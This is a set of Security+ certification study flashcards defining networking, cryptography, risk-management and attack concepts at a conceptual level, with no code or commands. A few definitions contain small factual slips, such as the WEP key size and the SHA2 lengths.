Security +
NIDS
(network intrusion detection system) A system that uses passive hardware sensors to monitor traffic on a specific segment of the network.
rogue access point
(rogue AP) is an AP placed within a network without official authorization. It might be an employee who is bypassing security or installed by an attacker.
Secure Staging Environment
1. Development, 2. Test, 3. Staging, 4. Production
Passive scan (Wireless Scanner)
a scanner just listens to all the traffic being broadcast on known channels within the 2.4 GHz and 5 GHz frequency ranges.
risk register
a comprehensive document listing known information about risks. ▪ It typically includes risk scores along with recommended security controls to reduce the risk scores.
warm site
a compromise between a hot site and a cold site.
legal hold
a court order to preserve data as evidence.
VPN concentrators
dedicated devices used to manage incoming VPN connections. They include all the services needed to create a secure VPN system, supporting many clients.
Hardware and firmware Security
electromagnetic interference (EMI), electromagnetic pulse (EMP), FDE and SED, UEFI and BIOS, Trusted Platform Module, Hardware security module (HSM).
Organized crime
elements are typically motivated by greed and money but often use sophisticated techniques.
full tunnel (VPN)
encrypts all traffic after a user has connected to a VPN
LDAP Secure (LDAPS)
encrypts data with TLS using TCP port 636.
Internet Protocol security (IPsec) Tunnel mode
encrypts the entire IP packet used in the internal networks and with VPNs transmitted over the Internet. The benefit is that the IP addressing used within the internal network is encrypted and not visible to anyone who intercepts the traffic. IPsec is a secure encryption protocol used with VPNs. Encapsulating Security Payload (ESP) provides confidentiality, integrity, and authentication for VPN traffic. IPsec uses Tunnel mode for VPN traffic and can be identified with protocol ID 50 for ESP. It uses IKE over port 500.
Secure Shell (SSH)
encrypts traffic in transit and can be used to encrypt other protocols such as FTP.
Continuing education programs
ensure that personnel are kept up to date on current technologies, threats, and vulnerabilities.
Motion detection
methods are also used with these methods to increase their effectiveness. Infrared detectors detect movement by objects of different temperatures.
Routers and stateless firewalls (or packet-filtering firewalls)
perform basic filtering with an access control list (ACL).
Encapsulating Security Payload (ESP)
to encrypt the data and provide confidentiality. ESP includes AH so it provides confidentiality, authentication, and integrity. ESP uses protocol number 50.
MDM Content management
After creating segmented storage spaces, it's important to ensure that appropriate content is stored there.
MDM Containerization
After creating segmented storage spaces, it's important to ensure that appropriate content is stored there...
Escalation
After identifying an incident, personnel often need to escalate it.
Lightweight Extensible Authentication Protocol (LEAP)
An alternative to TKIP for WPA ❑A Cisco-proprietary version of EAP.
Dipole Antenna
An antenna that detects signals from all directions equally (also called omnidirectional antenna). If you compare an ommni and a dipole radiating the same power you will find that there is more power from the dipole than an ommni in certain directions.
Static code analysis
Analysis of source code carried out without execution of that software. examines the code without running it
Implicit and Explicit Deny
Another way to look at it is this, a bouncer at a nightclub with a list of people allowed in is an example of Implicit Deny. Anyone not falling into that allowed list is denied entry. On the flip side, there could have been some problematic people in the club down the street that's not as popular, so there is no guest list, but the bouncer still has a list of names of people known to cause trouble in the club, those people are not allowed in, but anyone else can come in. That is an Explicit Deny.
Threat
Any circumstance or event that has the potential to compromise confidentiality, integrity, or availability. a potential danger and a threat assessment evaluates potential threats.
Physical Controls
Any controls that you can physically touch. e.g. lighting, signs, security guards, and more.
Sniffing attack
Attackers often use a protocol analyzer to capture data sent over a network.
Eradication (Incident Response Process)
Attempts to remove all malicious components from an attack
IPsec provides security in two ways
Authentication Header (AH) and Encapsulating Security Payload (ESP)
Something you are
Authentication factor that relies on a physical characteristic (fingerprint, face, eye, palm)
Something you have
Authentication factor that relies on possession (FOB, Card, Cell Phone, Key)
psychology-based principles
Authority ▪ Intimidation ▪ Consensus ▪ Scarcity ▪ Urgency ▪ Familiarity ▪ Trust
Device Deployment Models
Corporate-owned, personally enabled (COPE), bring your own device (BYOD), choose your own device (CYOD), and virtual desktop infrastructure (VDI).
Single Loss Expectancy (SLE)
Cost associated with a single realized risk against a specific asset. SLE = AV * EF
Virtualization
Creates multiple "virtual" machines on a single computing device
IPS vs IDS
Intrusion prevention systems are considered extensions of intrusion detection systems because they both monitor network traffic and/or system activities for malicious activity. The main differences are, unlike intrusion detection systems, intrusion prevention systems are placed in-line and are able to actively prevent/block intrusions that are detected. More specifically, IPS can take such actions as sending an alarm, dropping the malicious packets, resetting the connection and/or blocking the traffic from the offending IP address. An IPS can also correct Cyclic Redundancy Check (CRC) errors, unfragment packet streams, prevent TCP sequencing issues, and clean up unwanted transport and network layer options.
Risk Avoidance
Involves identifying a risk and making the decision to no longer engage in actions associated with that risk.
Risk Deterrence
Involves understanding something about the enemy and letting them know harm can come their way if they cause harm to you.
Power
a critical utility to consider when reviewing redundancies. ▪ A UPS provides fault tolerance for power and can protect against power fluctuations. It provides short-term power. ▪ Generators provide long-term power in extended outages.
Fixed-length Hashing
The output is always the same size no mater the size of the input.
Exposure Factor (EF)
The percentage of loss that an org would experience if a specific asset were violated
Host (virtualization)
The physical operating system hosting the VMs
Crossover Error Rate (CER)
The point at which FAR crosses over with the FRR. Expressed as a percentage, this is the most important metric. Lower CER indicates that the biometric system is more accurate.
Risk
The possibility or likelihood of a threat exploiting a vulnerability resulting in a loss.
Annual Loss Expectancy (ALE)
The possible yearly cost of all instances of a specific realized threat against a specific asset ALE = SLE * ARO or AV * EF * ARO
Full disk encryption (FDE)
The process of encrypting all the data on the hard disk drive used to boot a computer, including the computer's operating system, and permitting access to the data only after successful authentication with the full disk encryption product. encrypts an entire disk
Production (Secure Staging Environment)
The production environment is the final product.
Digital certificate
a data file that identifies individuals or organizations online and is comparable to a digital signature.
War dialing
War dialing is a technique of using a modem to automatically scan a list of telephone numbers, usually dialing every number in a local area code to search for computers, Bulletin board systems and fax machines. Hackers use the resulting lists for various purposes: hobbyists for exploration, and crackers - malicious hackers who specialize in computer security - for guessing user accounts (by capturing voicemail greetings), or locating modems that might provide an entry-point into computer or other electronic systems. It may also be used by security personnel, for example, to detect unauthorized devices, such as modems or faxes, on a company's telephone network.
Counter Mode With Cipher Block Chaining Message Authentication Code Protocol (CCMP)
Was created to replace WEP and TKIP/ WPA ❑Uses AES.
DNS poisoning or DNS cache poisoning
When successful, attackers modify the DNS cache with a bogus IP address.
End-of-life systems
When systems, hardware, or software are not supported by the original vendor, it is a vulnerability. When systems reach the end of their life, you need to ensure that they don't have any valuable data on them before disposing of them.
evil twin
a rogue access point with the same SSID as a legitimate access point. For example, many public places such as coffee shops, hotels, and airports include free Wi-Fi as a service.
Group Policy
Administrators use Group Policy Objects (GPOs) to configure settings.
AES
Advanced Encryption Standard. Key sizes 128, 192, or 256 bits.
Counter-mode
Converts a block cipher into a stream cipher.
RAID 10
configuration combines the features of mirroring (RAID-1) and striping (RAID-0).
Router
connects multiple network segments together into a single network and routes traffic between the segments.
wireless access point (AP)
connects wireless clients to a wired network.
Disassociation attack
effectively removes a wireless client from a wireless network, forcing it to reauthenticate.
asset value
identifies the worth of the asset to the organization.
distributed DoS (DDoS) attack
includes multiple computers attacking a single target.
Burning
media or documents in an incinerator.
File shredding
purges a file by repeatedly overwriting the space where the file is located with 1s and 0s.
CCMP
(Counter Mode with Cipher Block Chaining Message Authentication Code Protocol) Created to address the vulnerabilities presented by Wired Equivalent Privacy (WEP), a dated, insecure protocol. An encryption protocol designed for Wireless LAN products that implements the standards of the IEEE 802.11i amendment to the original IEEE 802.11 standard. CCMP is an enhanced data cryptographic encapsulation mechanism designed for data confidentiality and based upon the Counter Mode with CBC-MAC (CCM mode) of the Advanced Encryption Standard (AES) standard.
Heuristic/ behavioral-based detection
(also called anomaly-based detection) starts by identifying normal operation or normal behavior of the network. It does this by creating a performance baseline under normal operating conditions. Signature-based detection identifies issues based on known attacks or vulnerabilities. Signature-based detection systems can detect known anomalies. Heuristic or behavior- based IDSs (also called anomaly-based) can detect unknown
Signature-based IDSs
(also called definition-based) use a database of known vulnerabilities or known attack patterns. For example, tools are available for an attacker to launch a SYN flood attack on a server by simply entering the IP address of the system to attack. Signature-based detection identifies issues based on known attacks or vulnerabilities. Signature-based detection systems can detect known anomalies. Heuristic or behavior- based IDSs (also called anomaly-based) can detect unknown
Incident response process
1. Preparation, 2. Identification, 3. Containment, 4. Eradication, 5. Recovery, 6. Lessons Learned.
Advanced Encryption Standard (AES)
128, 192, 256 bit keys
Twofish
128-bit block cipher with 32 - 448 bit keys
SHA1
160 bit hash length. Still used but not as strong as SHA2
Triple-DES (3DES)
168-bit key
Health Insurance Portability and Accountability Act (HIPAA)
1996 mandates that organizations protect PHI.
FTP Port
21/20 TCP
SCP Port
22 TCP (uses SSH port)
SHA2
224, 256, 334, and 512 bit hash lengths
Telnet port
23 TCP
SMTP Port
25 TCP
Data Encryption Standard (DES)
56-bit key. Used since the mid 1970s.
Blowfish
64-bit block cipher with 32 - 448 bit keys
Snapshots
A snapshot backup captures all the data of an entire system at a point in time. It is a common technique used to create a checkpoint for a VM.
SMTP
sends email on TCP port 25 ▪ Unofficially uses TCP port 465 with SSL and TCP port 587 with TLS.
Least functionality
A core principle of secure systems design. Systems should be deployed with only the applications, services, and protocols needed to meet their purpose. is a core security principle stating that systems should be deployed with the least amount of applications, services, and protocols.
General Data Protection Regulation (GDPR)
the protection of privacy data for individuals within the EU.
Virtual Desktop Infrastructure (VDI) or Virtual Desktop Environment (VDE)
A desktop operating system running within a virtual machine (VM) running on a server.
Wireless LAN Controller
A device that cooperates with wireless lightweight access points (LWAP) to create a wireless LAN by performing some control functions for each LWAP and forwarding data between each LWAP and the wired LAN. (LWAP = Thin AP)
FM-200
A fire suppression system.
AUP (Acceptable Use Policy)
A Set of rules and guidelines that are set up to regulate Internet use and to protect the user. A document stipulating constraints and practices that a user must agree to for access to a corporate network or the Internet. Many businesses and educational facilities require that employees or students sign an acceptable use policy before being granted a network ID.
Secure Copy Protocol (SCP)
A TCP/IP protocol used mainly on UNIX and Linux devices that securely transports files by encrypting files and commands. It uses SSH for data transfer, and uses the same authentication and provides the same security as SSH. Unlike RCP, SCP will ask for passwords or passphrases if they are needed for authentication. SSH uses TCP port 22. All protocols encrypted by SSH, including SFTP, SHTTP, SCP, SExec, and slogin, also use TCP port 22.
Regression Testing Policy
A backout (regression testing) is a reversion from a change that had negative consequences. It could be, for example, that everything was working fi ne until you installed a service pack on a production machine, and then services that were normally available were no longer accessible. The backout, in this instance, would revert the system to the state that it was in before the service pack was applied. Backout plans can include uninstalling service packs, hotfi xes, and patches, but they can also include reversing a migration and using previous firmware. A key component to creating such a plan is identifying what events will trigger your implementing the backout.
Change Control Policy
A change control policy refers to the structured approach that is followed to secure a company's assets in the event of changes occurring.
Recovery Agent
A key recovery agent is an entity that has the ability to recover a private key, key components, or plaintext messages as needed. Using the recovered key the recovery agent can decrypt encrypted data.
Master Image
A master image provides a secure starting point for systems. Administrators sometimes create them with templates or with other tools to create a secure baseline. They then use integrity measurements to discover when a system deviates from the baseline.
Ping scan
A ping scan (sometimes called a ping sweep) sends an Internet Control Message Protocol (ICMP) ping to a range of IP addresses in a network. Network scanner
Port scan
A port scan checks for open ports on a system. Network scanner
Cluster Tip
A portion of a disk cluster that has not been fully taken up with the file written to it. Think of it this way, if you wrote a sentence on some paper with a pencil and then wanted to use the exact same line on the paper for a different message you would normally use an eraser to rub out the sentence and write your new message in its place. Well, windows kind of does this with hard drives but crucially windows doesn't erase the whole sentence, it only overwrites the sentence with the new message, so if the new message is shorter than the previous one you get a cluster tip.
Rainbow Table Attack
A rainbow table attack is a type of hacking wherein the perpetrator tries to use a rainbow hash table to crack the passwords stored in a database system. A rainbow table is a hash function used in cryptography for storing important data such as passwords in a database
Sector Antenna
A sector antenna is a type of directional microwave antenna with a sector-shaped radiation pattern. The word "sector" is used in the geometric sense; some portion of the circumference of a circle measured in degrees of arc.
TKIP (Temporal Key Integrity Protocol)
A security protocol created by the IEEE 802.11i task group to replace WEP. USed in WPA. Was designed as the replacement of WEP without replacing the existing legacy wireless hardware ❑Provides the rotation of keys. TKIP reveals part of the key every time you try to connect. TKIP is weak.
PBX (Private Branch Exchange)
A telephone switch used to connect and manage an organization's voice calls. A private telephone network used within a company or organization. The users of the PBX phone system can communicate internally (within their company) and externally (with the outside world), using different communication channels like Voice over IP, ISDN or analog.
swap file (page file)
A temporary storage area on the hard drive where the operating system "swaps out" or moves the data or instructions from random access memory (RAM) that haven't recently been used. This process takes place when more RAM space is needed.
Model verification
A test used to ensure that the projected application meets all specifications at that point. ensures that the application meets all specifications and fulfills its intended purpose.
Thin AP
A thin AP is a controller-based AP, meaning that it isn't a stand-alone AP, but rather an AP managed by a controller. Administrators use a wireless controller to configure and manage thin-based APs. A fat AP is also known as a stand-alone AP and is managed independently. A thin AP is also known as a controller-based AP and is managed by a wireless controller. The wireless controller configures the thin AP. A thin AP is more like an Antenna.
Spim
A variation of spam, which targets instant messaging users instead of email users. Could be on Social Media sites like Facebook or Instagram
Password Authentication Protocol (PAP)
A weak authentication protocol that has been replaced by the Extensible Authentication Protocol (EAP). PAP sends passwords in cleartext so PAP is used only as a last resort. PAP authentication uses a password or a PIN. A significant weakness is that PAP sends the information across a network in cleartext, making it susceptible to sniffing attacks.
Captive Portals
A web page that the user of a public-access network is obliged to view and interact with before access is granted Typically used by business centers, airports, hotel lobbies, coffee shops, and other venues that offer free Wi-Fi hot spots for Internet users May require the user to input payment information, provide login credentials, or input an access code Also used to display an acceptable use policy, privacy policy, and tracking policy to the users
Remote Access
Administrators connect to servers remotely using protocols such as Secure Shell (SSH) and the Remote Desktop Protocol (RDP port 3389). ▪ In some cases, administrators use virtual private networks to connect to remote systems.
One of the primary reasons that wireless attacks are successful
APs are misconfigured.
Host elasticity and scalability
Ability to resize computing capacity based on the load
Transparent proxy servers
Accept and forward requests without modifying them. This proxy isn't seen by the computer.
Hardware
Additional physical security controls protect individual systems. ▪ For example, server rooms often have locking cabinets to protect servers and other equipment installed in the equipment bays.
Enable a disabled account
Administrators can reset the user's password and take control of the account.
Full Backup
All data is backed up which requires a lot of time and storage space.
Identification (Incident Response Process)
All events aren't security incidents so when a potential incident is reported, personnel take the time to verify it is an actual incident.
Security Assertion Markup Language (SAML)
An XML-based standard used to exchange authentication and authorization information. is an Extensible Markup Language (XML)-based data format used for SSO on web browsers. e.g. using a google account to sign into other sites. One authentication system sharing with another.
Port Channel
An aggregation of multiple physical interfaces that creates a logical interface. You can bundle up to eight individual active links into a port channel to provide increased bandwidth and redundancy. Port channeling also load balances traffic across these physical interfaces. The port channel stays operational as long as at least one physical interface within the port channel is operational.
Application whitelist and blacklist
An application whitelist is a list of authorized software and it prevents users from installing or running software that isn't on the list. An application blacklist is a list of unauthorized software and prevents users from installing or running software on the list.
Armored Virus
An armored virus is coded to make it difficult for antivirus to unravel and understand. It uses a variety of techniques to do so like fooling antivirus to believe that it lies somewhere else than its real location or using compression to complicate its code.
VM escape
An attack in which the attacker "breaks out" of a VM's normally isolated state and interacts directly with the hypervisor.
IV Attack
An attack where the attacker is able to predict or control the initialization vector of an encryption process, thus giving the attacker access to view the encrypted data that is supposed to be hidden from everyone else except for the user or network. Hackers use a dictionary attack to decrypt the exchanged encrypted message by discovering a pattern.
Wi - Fi Protected Access (WPA)
An early alternative to WEP ❑Based on LEAP and TKIP cryptosystem and employs a secret passphrase. ❑Interim solution until the release of 802.11i ❑Correct some of the serious weaknesses of WEP ❑Introduces the Temporal Key Integrity Protocol(TKIP) ➢Replaces WEP short key with TKIP 128 bits per packet key. This system should not be used.
IV
An initialization vector is used to avoid repetition during the data encryption process, making it impossible for hackers who use dictionary attack to decrypt the exchanged encrypted message by discovering a pattern. - A particular binary sequence may be repeated more than once in a message, and the more it appears, the more the encryption method is discoverable. For example if a one-letter word exists in a message, it may be either "a" or "I" but it can't be "e" because the word "e" is non-sensical in English, while "a" has a meaning and "I" has a meaning. Repeating the words and letters makes it possible for software to apply a dictionary and discover the binary sequence corresponding to each letter. Using an initialization vector changes the binary sequence corresponding to each letter, enabling the letter "a" to be represented by a particular sequence in the first instance, and then represented by a completely different binary sequence in the second instance. - WEP (Wireless Equivalent Privacy) is vulnerable to an IV attack. Because RC4 is a stream cipher, the same traffic key must never be used twice.
MDM Context-aware authentication
Context-aware authentication uses multiple elements to authenticate a user and a mobile device.
BSD
Berkeley Software Distribution
Buildings
Buildings commonly have additional controls for both safety and security.
Personal Identity Verification (PIV)
Card is a specialized smart card used by U.S. Federal agencies. it also includes photo identification and provides confidentiality, integrity, authentication, and non-repudiation for the users, just as CAC does.
Deterrent Controls
Controls designed to discourage people from violating security directives. e.g. Cable locks, hardware locks, cameras.
CSR
Certificate Signing Request is a message sent from an applicant to a certificate authority in order to apply for a digital identity certificate. When you renew a certificate you send a CSR to the CA to get the certificate resigned.
Change management
Change management defines the process and accounting structure for handling modifications and upgrades. The goals are to reduce risks related to unintended outages and provide documentation for all changes. helps ensure that developers do not make unauthorized changes. ▪ change management process allows several people to examine the change to ensure it won't cause unintended consequences.
Stealth Virus
Changes the code that can be used to detect it. Hence, the detection of virus becomes very difficult.
Order of volatility
Cache memory ▪ Regular RAM ▪ Swap or paging file ▪ Hard drive data ▪ Logs stored on remote systems ▪ Archived media
MDM Biometrics
Chapter 2 discusses biometrics as one of the authentication factors (something you are)...
Apple macOS
Closed-source operating system only compatible with Apple manufactured hardware.
Microsoft Windows
Closed-source operating system that is compatible with hardware from many different manufactures.
Data Destruction and Media Sanitization
Computers that reach the end of their life cycle will need to be disposed of. To ensure that the computers don't include any sensitive data or damaging to your organization if unauthorized people receive it.
OpenID
Connects works with OAuth 2.0 and it allows clients to verify the identity of end users without managing their credentials. In this context, the client is typically a web site or application that needs to authenticate users.
PEM
Contain ASCII armored data prefixed with a - BEGIN. These are X.509v3 files.
Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
CRC
Cyclic Redundancy Check is an error-detecting code commonly used in digital networks and storage devices to detect accidental changes to raw data.
Certificate Formats
DER, PEM, PFX, CER, P12, and P7b.
DER
DER-encoded certificates use DER, CER, and CRT file extentions.
Digital cameras
Digital cameras typically include built-in storage and support additional storage by plugging in a memory card.
Authorization
Grant or restrict access to resources using an authorization method such as permissions.
DNS Attacks
DNS poisoning attacks attempts to corrupt DNS records. Many current DNS servers use Domain Name System Security Extensions (Consensus) to protect the DNS records and prevent DNS poisoning attacks.
Common Standards that use Symmetric Algorithms
Data Encryption Standard (DES), Triple-DES (3DES), Advanced Encryption Standard (AES), Ron's Cipher (RC), Blowfish, and Twofish.
Wired Equivalent Privacy (WEP)
Defined by IEEE 802.11 ❑WEP is designed to provide a WLAN with a level of security and privacy comparable to what is usually expected of a wired LAN ❑Uses a predefined shared secret static key. Uses a 48-bit key. This system should not be used
IRP includes
Definitions, Cyber Security Incident Response Team (CSIRT), Roles and responsibilities, Escalation, Reporting requirements, and Exercises.
Reporting requirements
Depending on the severity of the incident, security personnel might need to notify executives within the company of the incident.
Diameter
Diameter was created to overcome some of the limitations of RADIUS and is often used instead of RADIUS. Diameter can utilize EAP
Yagi-Uda Antenna
Directional antenna, limited field, long range communications, narrow beam width greater chances for attackers at greater distances
1. Asset Value (AV)
Dollar value of an asset
Educate Users on the following
Don't click on links within emails from unknown sources (no matter how curious you might be). ▪ Don't open attachments from unknown sources. ▪ Be wary of free downloads from the Internet. ▪ Limit information you post on social media sites. ▪ Back up your data regularly ▪ Keep your computer up to date with current patches ▪ Keep antivirus software up to date
Self-encrypting drives (SEDs)
Drives that can automatically encrypt any data stored on it. An SED includes the hardware and software to encrypt all data on the drive and securely store the encryption keys.
ECDHE
Elliptical Curve Diffie-Hellman Ephemeral provides both CRC integrity checks and RCA encryption. Adding an ephemeral key to Elliptic Curve Diffie-Hellman turns it into ECDHE. It is the ephemeral component of each of these that provides the perfect forward secrecy. Forward secrecy is a property of any key exchange system, which ensures that if one key is compromised, subsequent keys will not also be compromised. Perfect forward secrecy occurs when this process is unbreakable.
electromagnetic interference (EMI)
EMI originates from sources such as motors, power lines, and fluorescent lights and can be prevented with shielding.
ECC
Elliptic Curve Cryptography uses smaller key sizes to obtain the same level of security as RSA.
Enable MAC Filtering
Enabling media access control (MAC) filtering provides a small measure of security to a wireless network. MAC filtering can restrict access to a wireless network to specific clients. However, an attacker can use a sniffer to discover allowed MAC addresses and circumvent this form of network access control. It's relatively simple for an attacker to spoof a MAC address.
Protected Extensible Authentication Protocol (PEAP)
Encapsulates EAP methods within a TLS tunnel that provides authentication and potentially encryption. TLS gives encryption.
Difference between Hashing and Encryption
Encryption is a two way function; what is encrypted can be decrypted with the proper key.
MDM Full device encryption
Encryption protects against loss of confidentiality on multiple platforms, including workstations, servers, mobile devices, and data transmissions.
Cipher-block chaining (CBC)
Encrypts a block and takes it's output, XOR's it with the plaintext of the next block. This adds diffusion and makes known plain-text attacks ineffective.
ERM Software
Enterprise Risk Management Software
Entrapment
Entrapment is the process in which a law enforcement officer or a government agent encourages or induces a person to commit a crime when the potential criminal expresses a desire not to go ahead. Entrapment is a valid legal defense in a criminal prosecution.
Hoax Attack
Example: attacker posts link to fake AV software on multiple social networks. Makes people believe that the fake AV software is genuine.
Annual Rate of Occurrence (ARO)
Expected frequency with which a specific threat or risk will occur within a single year
External storage devices
External storage devices include any external device that has memory capabilities. They can transport malware without the user's knowledge and can be a source of data leakage. Malicious users can copy and steal a significant amount of information using an easily concealable thumb drive. Block them from the network and encrypt them.
ftps pros/cons
FTPS (FTP/SSL) is a name used to provide a number of ways that FTP software can perform secure file transfers. Each way involves the use of a SSL/TLS layer below the standard FTP protocol to encrypt the control and/or data channels. Pros: Widely known and used The communication can be read and understood by a human Provides services for server-to-server file transfer SSL/TLS has good authentication mechanisms (X.509 certificate features) FTP and SSL/TLS support is built into many internet communications frameworks Cons: Does not have a uniform directory listing format Requires a secondary DATA channel, which makes it hard to use behind firewalls Does not define a standard for file name character sets (encodings) Not all FTP servers support SSL/TLS Does not have a standard way to get and change file or directory attributes
Server redundancy
Failover clusters
FAT
File Allocation Table is a file system created by Microsoft and used for its earliest DOS operating systems.
Remove the heat
Fire extinguishers commonly use chemical agents or water to remove the heat.
Remove the fuel
Fire-suppression methods don't typically fight a fire this way, but of course, the fire will go out once all the material is burned.
White Box Test
Full Knowledge. Full information is provided. As much documentation as possible. Also called Crystal or Open Test. From a system administrator's perspective.
Backup Types
Full, Differential, Incremental, and Snapshots
FQDN
Fully Qualified Domain Name
MDM GPS tagging
GPS tagging (also called geotagging) adds geographical information to files such as pictures when posting them to social media web sites.
Social Engineering
Hackers use their social skills to trick people into revealing access credentials or other valuable information. Could be a friend or colleague.
HMAC
Hash-Based Message Authentication Code. Both sender and receiver computers would know the same secret key. If you can recognize the hashing algorithms such as MD5, SHA, and HMAC, it will help you answer many exam questions. For example, if a question asks what you would use to encrypt data and it lists hashing algorithms, you can quickly eliminate them because hashing algorithms don't encrypt data.
Credential management systems
Helps user store credentials that is a collected over time. Users often have multiple credentials that they need to remember, especially when they access many web sites. help users store these credentials securely.
HIPS
Host Based Intrusion Prevention System. A Host-based intrusion prevention system (HIPS) is an installed software package which monitors a single host for suspicious activity by analyzing events occurring within that host. As a zero-day attack is an unknown vulnerability (a vulnerability that does not have a fix or a patch to prevent it), the best defence would be an intrusion prevention system.
Reverse Proxy
In computer networks, a reverse proxy is a type of proxy server that retrieves resources on behalf of a client from one or more servers. These resources are then returned to the client, appearing as if they originated from the proxy server itself.
Well-known ports: 0- 1023.
IANA assigns port numbers to commonly used protocols in the well-known ports range.
Registered ports: 1024- 49,151.
IANA registers these ports for companies as a convenience to the IT community.
Account Disablement Policy
Identifies what to do with accounts for employees who permanently leave or are on a leave of absence. Most policies require admins to disable the account ASAP. Disabling the account ensures the data associated with it remains available.
Displays
If displays show sensitive or private data, their view should be limited, use privacy screens.
Mandatory access control (MAC)
In a MAC environment everything is assigned a classification marker. Subjects are assigned a clearance level and objects are assigned a sensitivity label. MAC also includes the use of need to know. Need to know is a security restriction where some objects are restricted unless the subject has a need to know them.
Polymorphic Virus
In order to avoid detection by antivirus a polymorphic virus changes each time it is installed. The functionality of virus remains same but its signature is changed.
MDM Storage segmentation
In some mobile devices, it's possible to use storage segmentation to isolate data.
Door and Lock Type's
In the event of a fire, door access systems should allow personnel to exit the building without any form of authentication. Access points to data centers and server rooms should be limited to a single entrance and exit whenever possible... Cipher locks, Proximity cards, Biometrics locks, Tailgating, Mantraps, Cable locks, and Locking cabinets.
WPA2
Indicates full compliance with 802.11i ➢Replaces TKIP with Cipher Block Chaining Message Authentication Code Protocol (CCMP) ➢AES based encryption, stronger than TKIP ➢Address some of the vulnerabilities of TKIP ❑Mandatory for devices since 2006. All organizations should use this system.
Information classification training
Information classification is done by confidentiality and comprises of three categories, namely: public use, internal use and restricted use. Knowing these categories and how to handle data according to its category is essential in protecting the confidentiality of the data.
ISA
Interconnection Security Agreement is an agreement between two organizations that have connected systems. The agreement documents the technical requirements of the connected systems.
IANA
Internet Assigned Numbers Authority. The Internet Assigned Numbers Authority is a standards organization that oversees global IP address allocation, autonomous system number allocation, root zone management in the Domain Name System, media types, and other Internet Protocol-related symbols and Internet numbers.
Recover a deleted account
It is also possible to recover a deleted account. This is more complex than simply creating another account with the same name. Instead, administrators follow detailed procedures to recover the account.
Key Escrow
Key escrow addresses the possibility that a third party may need to access keys. Under the conditions of key escrow, the keys needed to encrypt/decrypt data are held in an escrow account (think of the term as it relates to home mortgages) and made available if that third party requests them. The third party in question is generally the government, but it could also be an employer if an employee's private messages have been called into question.
Linux-based or Unix-based systems
Open-source operating system available in many diverse distributions (distros).
Challenge Handshake Authentication Protocol (CHAP)
Like PAP, CHAP performs one-way authentication. However, authentication is performed through a three-way handshake (challenge, response, and acceptance messages) between a server and a client. The three-way handshake allows a client to be authenticated without sending credential information across a network. CHAP uses a handshake process where the server challenges the client. The client then responds with appropriate authentication information. Replaced by EAP. CHAP is more secure than PAP because passwords are not sent over the network in cleartext.
MAC Filter
List of authorized wireless client interface MAC addresses that is used by a wireless access point to block access to all non-authorized addresses
Shoulder Surfing
Looking over someone's shoulder either in person or with a camera in hopes of viewing sensitive information. Screen/Privacy filters help prevent shoulder surfing by obscuring the view of the screen without direct line-of-sight.
Message Digest Algorithm (MD)
MD5: 128-bit hash length, considered the weakest. ▪ Microsoft uses MD5 as part of NTLM to provide authentication.
MDM Application management
MDM tools can restrict what applications can run on mobile devices.
Printers and other multi-function devices (MFDs)
MFDs often have extra features that should be considered when purchasing them, especially if they will process sensitive information.
MS-CHAPv2
MS-CHAP is deprecated in favor of MS-CHAPv2. It includes several improvements, including the ability to perform mutual authentication.
IRP Roles and responsibilities
Many incident response plans identify specific roles for an incident response team along with their responsibilities.
Remove the oxygen
Many methods use a gas, such as carbon dioxide (CO2) to displace the oxygen.
File System Security
Many operating systems support file- and folder-level encryption. ▪ Linux systems support GNU Privacy Guard (GnuPG or GPG), which is a commandline tool used to encrypt and decrypt files with a password. ▪ Microsoft NTFS includes the Encrypting File System (EFS), available in most Windows operating systems.
Poisoning attack
Many protocols store data in cache for temporary access. Poisoning attacks attempt to corrupt the cache with different data.
MD5
Message Digest Algorithm 5. 128-bit hash length, considered the weakest. Microsoft uses MD5 as part of NTLM to provide authentication. It can still be used as a checksum to verify data integrity, but only against unintentional corruption.
Accounting (AAA)
Methods used to track user activity.
Perimeter
Military bases and many other organizations erect a fence around the entire perimeter of their land.
MDM Passwords and PINs
Mobile devices commonly support the use of passwords or personal identification numbers (PINs).
MaaS
Monitoring as a Service is a cloud delivery model that falls under anything as a service (XaaS). MaaS allows for the deployment of monitoring functionalities for several other services and applications within the cloud.
MDM Screen locks
Most devices support the use of a passcode or password to lock the device.
MPLS
Multi-Protocol Label Switching is a routing technique in telecommunications networks that directs data from one node to the next based on short path labels rather than long network addresses, thus avoiding complex lookups in a routing table and speeding traffic flows.
Time Synchronization
NTP is the most commonly used protocol for time synchronization, allowing systems to synchronize their time to within tens of milliseconds.
Secure Hash Algorithm (SHA)
SHA1: 160-bit hash length ▪ SHA2: 224, 256, 334, and 512 bit hash lengths
IEEE 802.1x
Network Access Control (NAC). a port-based authentication protocol. It requires users or devices to authenticate when they connect to a specific wireless access point, or a specific physical port, and it can be implemented in both wireless and wired networks.
No SQL vs SQL
NoSQL databases are not vulnerable to SQL injection attacks.
802.1X/ Extensible Authentication Protocol (EAP)
Not a specific mechanism for authentication, rather it is an authentication framework ❑Controls port access between devices, AP, and servers ❑Uses dynamic keys instead of static key ❑Requires mutual authentication protocol ❑Goes thru WLAN AP to reach authentication server ➢Permits number of authentication methods ➢RADIUS is the market de facto standard ➢SecureID could be used ➢Digital Certificates could be used -RADIUS uses UDP
Use pop-up blockers
Not only are pop-ups irritating, but they are also a security threat. Pop-ups (including pop-unders) represent unwanted programs running on the system, and they can jeopardize the system's well-being. This will be more effective on a mobile device rather than a terminal server.
Nonce
Number occurring once
Access Control Objects
Objects are items such as files, folders, shares, and printers that subjects access.
Risk Acceptance
Often the choice you must make when the cost of implementing any of the other four choices exceeds the value of the harm that would occur if the risk came to fruition.
One-way Hashing
Once something is hashed is cannot be unhashed.
Exercises
One method of preparing for incident response is to perform exercises. These can test the response of all members of the team.
OTP (Acronym)
One-time password
MDM Geofencing
Organizations sometimes use GPS to create a virtual fence or geographic boundary using geofencing technologies.
PHI (Personal Health Information)
PII that includes medical or health information. Organizations have an obligation to protect PII and PHI and often identify procedures for handling and retaining PII in data policies.
PFX
PKCS#12 standard certificate
More common methods used to destroy data and sanitize media are:
Paper shredding, Pulping, degausser, and Pulverizing
RAID Parity
